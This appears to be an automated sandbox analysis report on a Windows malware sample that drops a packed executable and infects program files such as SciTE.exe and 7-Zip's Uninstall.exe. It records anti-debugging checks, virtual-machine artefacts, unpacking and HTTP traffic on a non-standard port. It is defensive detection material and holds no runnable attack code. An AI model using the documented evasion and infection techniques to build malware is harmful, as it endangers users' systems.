Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: BXOZIGZEUa.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: BXOZIGZEUa.exe

Static file information: File size 1700352 > 1048576

Source: BXOZIGZEUa.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x126a00

Source: BXOZIGZEUa.exe

Static PE information: More than 200 imports for USER32.dll

Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: BXOZIGZEUa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: BXOZIGZEUa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: BXOZIGZEUa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Workspace\Driver\DriverUninstall\Release\DriverUninstall.pdb source: BXOZIGZEUa.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.3.dr

Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: BXOZIGZEUa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Unpacked PE file: 3.2.JdEV.exe.340000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_002D397D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_002D397D

Source: initial sample

Static PE information: section where entry point is pointing to: uY

Source: BXOZIGZEUa.exe	Static PE information: section name: uY
Source: JdEV.exe.1.dr	Static PE information: section name: .aspack
Source: JdEV.exe.1.dr	Static PE information: section name: .adata
Source: MyProg.exe.3.dr	Static PE information: section name: PELIB
Source: MyProg.exe.3.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.3.dr	Static PE information: section name: u
Source: Uninstall.exe.3.dr	Static PE information: section name: EpNuZ

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002BEB2E push ecx; ret	1_2_002BEB41
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002BF1C5 push ecx; ret	1_2_002BF1D8
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 3_2_00341638 push dword ptr [00343084h]; ret	3_2_0034170E
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 3_2_00346014 push 003414E1h; ret	3_2_00346425
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 3_2_00342D9B push ecx; ret	3_2_00342DAB
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 3_2_0034600A push ebp; ret	3_2_0034600D

Source: BXOZIGZEUa.exe	Static PE information: section name: uY entropy: 6.933836062310107
Source: JdEV.exe.1.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: MyProg.exe.3.dr	Static PE information: section name: Y\|uR entropy: 6.934625577189198
Source: SciTE.exe.3.dr	Static PE information: section name: u entropy: 6.933790191594832
Source: Uninstall.exe.3.dr	Static PE information: section name: EpNuZ entropy: 6.9344305753247575

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	File created: C:\Users\user\AppData\Local\Temp\JdEV.exe	Jump to dropped file

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

File created: C:\Users\user\Desktop\uninstall.log

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 799

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_0020814E IsWindowVisible,IsIconic,	1_2_0020814E
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_0021A4EB GetParent,GetParent,IsIconic,GetParent,	1_2_0021A4EB
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_00214603 IsIconic,PostMessageW,	1_2_00214603
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001E0624 SetForegroundWindow,IsIconic,	1_2_001E0624
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001E06C8 IsIconic,	1_2_001E06C8
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_00212724 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,	1_2_00212724
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002009D9 GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,	1_2_002009D9
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002131B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	1_2_002131B3
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002131B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	1_2_002131B3
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002131B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	1_2_002131B3
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002134B3 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,	1_2_002134B3
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001EB730 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	1_2_001EB730
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_00213A3E IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,	1_2_00213A3E

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_001CE757 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_001CE757

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_001C2540 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,GetLastError,GetLastError,GetLastError,GetLastError,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,SetupDiCallClassInstaller,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,

1_2_001C2540

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_3-1066

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

API coverage: 5.2 %

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 3_2_00341718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00341754h

3_2_00341718

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001CB7F2 lstrlenW,SetLastError,FindFirstFileW,GetLastError,__wfullpath,__wsplitpath_s,__wmakepath_s,	1_2_001CB7F2
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001CB3FE GetModuleHandleW,GetProcAddress,FindFirstFileW,	1_2_001CB3FE
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_001DD5ED __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	1_2_001DD5ED
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 3_2_003429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	3_2_003429E2

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 3_2_00342B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

3_2_00342B8C

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: JdEV.exe, 00000003.00000003.1379761142.0000000001215000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001250000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001215000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000003.1379761142.0000000001250000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BXOZIGZEUa.exe, 00000001.00000002.1370356024.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @SYSTEM:vmci.inf_amd64_68ed49469341f563P
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BXOZIGZEUa.exe, 00000001.00000002.1370356024.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @SYSTEM:vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: BXOZIGZEUa.exe, 00000001.00000002.1371046357.0000000002B78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware.0
Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

API call chain: ExitProcess graph end node

graph_3-1041

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_002BC787 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_002BC787

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

1_2_002D397D

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_00366044 mov eax, dword ptr fs:[00000030h]

1_2_00366044

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_002D9DE5 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

1_2_002D9DE5

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002BC787 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		1_2_002BC787
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 1_2_002C3EF0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_002C3EF0

Source: SciTE.exe.3.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_002D22DF
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	1_2_002D2767
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	1_2_002D27CE
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	1_2_002D280A
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryExW,	1_2_001C8F07
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: GetLocaleInfoA,	1_2_002D5C9F

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

1_2_001C2540

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 1_2_002C20CC GetSystemTimeAsFileTime,__aulldiv,

1_2_002C20CC

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

